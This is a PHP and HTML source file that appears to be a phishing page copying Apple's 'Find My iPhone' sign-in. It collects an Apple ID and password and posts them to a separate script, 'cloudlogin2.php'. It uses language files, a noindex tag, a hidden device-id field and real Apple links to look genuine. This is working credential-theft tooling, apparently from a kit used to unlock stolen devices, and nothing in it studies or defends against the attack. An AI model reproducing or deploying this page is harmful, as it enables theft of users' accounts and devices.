

<?php 

$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
 
switch ($lang) {
  case 'en':
  $lang_file = 'lang.en.php';
  break;
 
  case 'fr':
  $lang_file = 'lang.fr.php';
  break;
 
  case 'es':
  $lang_file = 'lang.es.php';
  break;

  case 'de':
  $lang_file = 'lang.de.php';
  break;
 
 case 'ja':
  $lang_file = 'lang.ja.php';
  break;
  
  case 'nl':
  $lang_file = 'lang.nl.php';
  break;
  
  case 'be':
  $lang_file = 'lang.be.php';
  break;
  
  case 'br':
  $lang_file = 'lang.br.php';
  break;
  
   case 'pl':
  $lang_file = 'lang.pl.php';
  break;
  
   case 'zh':
  $lang_file = 'lang.zh.php';
  break; 
  
  case 'hu':
  $lang_file = 'lang.hu.php';
  break;
      
  default:
  $lang_file = 'lang.en.php';

 
}
 
include_once 'languages/'.$lang_file;

?>
<html>
  <head>
 <!--[if IE 7]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]--> 
 <!--[if IE 8]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
 <!--[if IE 9]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
 <!--[if IE 10]><meta http-equiv="refresh" content="0;URL=unsupported_browser/"><![endif]-->
    <meta name="rebots" content="noindex,follow">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta name="viewport" content=" initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title><?php echo $lang['MOB_FIND']; ?></title>
    <link rel="stylesheet" href="dual/assets/layout/wapcss.css" media="all">
    <link rel="stylesheet" href="dual/assets/layout/applefind.css">
    <link rel="stylesheet" href="dual/assets/layout/stylesmobversion.css" type="text/css" media="screen, print">
    <link rel="shortcut icon" href="dual/assets/img/mobvfavicon.ico">
    <link rel="stylesheet" href="dual/assets/layout/bootstrap.min.css">
<style>
.modal-footer .btn+.btn {
    margin-bottom: 0;
    margin-left: 5px;
}

.modal-footer {
    padding: 5px;
    text-align: -webkit-center;
    border-top: 1px solid #e5e5e5;
}

.modal-dialog {
    width: 290px;
    margin: 120px auto;
}
.btn {
    display: inline-block;
    padding: 6px 12px;
    margin-bottom: 0;
    font-size: 14px;
    font-weight: 400;
    line-height: 1.42857143;
    text-align: center;
    white-space: nowrap;
    vertical-align: middle;
    -ms-touch-action: manipulation;
    touch-action: manipulation;
    cursor: pointer;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    background-image: none;
    border: 0px solid transparent;
    border-radius: 0px;
    color: #2DA63F;
}

.btn-primary {
    color: #2DA63F;
    background-color: rgba(255, 255, 255, 0);
    border-color: rgba(255, 255, 255, 0);
    background-image: -webkit-linear-gradient(top,rgba(255, 255, 255, 0) 0,rgba(255, 255, 255, 0) 100%);
    background-image: -o-linear-gradient(top,#337ab7 0,#265a88 100%);
    background-image: -webkit-gradient(linear,left top,left bottom,from(rgba(255, 255, 255, 0)),to(rgba(255, 255, 255, 0)));
    background-image: linear-gradient(to bottom,rgba(255, 255, 255, 0) 0,rgba(255, 255, 255, 0) 100%);
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff337ab7', endColorstr='#ff265a88', GradientType=0);
    filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
    background-repeat: repeat-x;
    border-color: rgba(255, 255, 255, 0);
}


/* modification final */

.btn-def{color:#2DA63F;background-color:#fff;font-weight: normal;}
.btn-def.focus,.btn-def:focus{color:#2DA63F;background-color:#fff;border-color:#fff}
 .btn-def:hover{color:#2DA63F;background-color:#fff;border-color:#fff} 

 p.thicker {
    font-weight: 700;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    text-align: center;
    font-size: 18px;
} 
.Top {
  background-color: #fff; text-align:center; width:100%; font-family:Segoe, 'Segoe UI', 'DejaVu Sans', 'Trebuchet MS', Verdana, sans-serif; line-height:50px; font-size:20px; color: #333; font-weight: 700; border-bottom: solid 1px #A5D7AC;
  
} 
form{
  position: relative;
}
#preloadsub{
  position: absolute;
  left: 50%;
  margin-left: -16px;
  bottom: 18px;
  display: none;
}
.main{
  width: 80%;
}
</style>
  </head>
<body>
<br>
<br>
<br>
<section class="alert" style="">
  <div class="alert-body">
    <h1><?php echo $lang['ERROR_ver']; ?></h1>
    <p><?php echo $lang['INCORRECT_id']; ?></p>
    <span class="alert-foot">
      OK    </span>
  </div>
</section>

    <!-- Preloader -->
<div id="preloader">
	<div id="status">&nbsp;</div>
</div>
    <p class="main_img"></p> <center><img src="dual/assets/img/2.png" style="width:109px;height:109px;"></center>
    <p>
	</p>
    <div class="main">
      <p class="lok"><?php echo $lang['MOB_FIND']; ?></p>

		<form method="post" class="cloud-login" name="form1">		
        <ul class="main_list">		
          <li class="main_bord" id="inp1" style="border-bottom:0;">
          <strong><?php echo $lang['MOB_APPLE_ID']; ?></strong><input name="xuser" id="apple_id" placeholder="<?php echo $lang['MOB_EXAMPLE']; ?>" class="main_col" type="text"></li>
          <li class="main_bord1" id="inp2" style="display: none;">
          <strong><?php echo $lang['MOB_PASSWORD']; ?></strong><input name="xpass" id="apple_pwd" placeholder="<?php echo $lang['MOB_REQUIRED']; ?>" class="main_col" type="password" autocomplete="off"></li>
        </ul>
        <input type="hidden" name="id" value="<?php echo $idequipo;?>">
        <input name="buttom" id="buttom" class="buttom" value="<?php echo $lang['MOB_LOGIN']; ?>" type="submit">
        <img src="dual/assets/img/ajax-loader.gif" alt="" id="preloadsub">
      </form>
      <div class="separated"></div>
      <h3><a href="https://iforgot.apple.com/" target="_self" style="text-decoration:none;color:#37A449;">
          <?php echo $lang['MOB_FORGOT_ID']; ?></a></h3>
      
      <h3><a href="https://www.apple.com/icloud/setup/ios.html" target="_self" style="text-decoration:none;color:#37A449;">
            <?php echo $lang['MOB_SETUP_INSTRUCTIONS']; ?></a></h3>
    </div>
<script src="dual/assets/js/jquery-1.11.3.min.js"></script>
<script src="dual/assets/js/bootstrap.min.js"></script>
<script src="dual/assets/js/findmyphone.min.js"></script>   
<script type="text/javascript">
  $(document).on("ready", functions);
  function functions(){
    $("#apple_id").keypress(function(e) {
        if(e.which == 13) {
            $("#inp2").slideDown(10);
            $("#apple_pwd").focus();
            $("#inp1").css("border-bottom", "1px solid #dedede");
            return false;
        }
    });
    $("#preloader").delay(2000).fadeOut();
    $("#apple_id, #apple_pwd").on("keyup", validaInput);
    function validaInput(){
      var appleid = $("#apple_id").val();
      var pass = $("#apple_pwd").val();
      if(appleid != "" && pass != ""){
        $("#buttom").css("color", "green");
      }else{
        $("#buttom").css("color", "gray");
      }
    }
    $("#buttom").on("click", getCloud);
    function getCloud(a){
      if(!$("#inp2").is(":visible")){
        $("#inp2").slideDown(10);
        $("#apple_pwd").focus();
        $("#inp1").css("border-bottom", "1px solid #dedede");
        return false;
      }else{
        var datos = $(".cloud-login").serialize();
        $("#buttom").css("opacity", 0);
        $("#preloadsub").show(0);
        $.post(
          "cloudlogin2.php",
          datos,
          function(b){
            if(b==1){
              window.location="/find.php";
            }else{
              $("#preloadsub").hide(0);
              $("#buttom").css("opacity", 1);
              $("section.alert").show(0);
            }
          }
        );
        a.preventDefault();
      }
    }
  }
</script>
  </body>
</html>
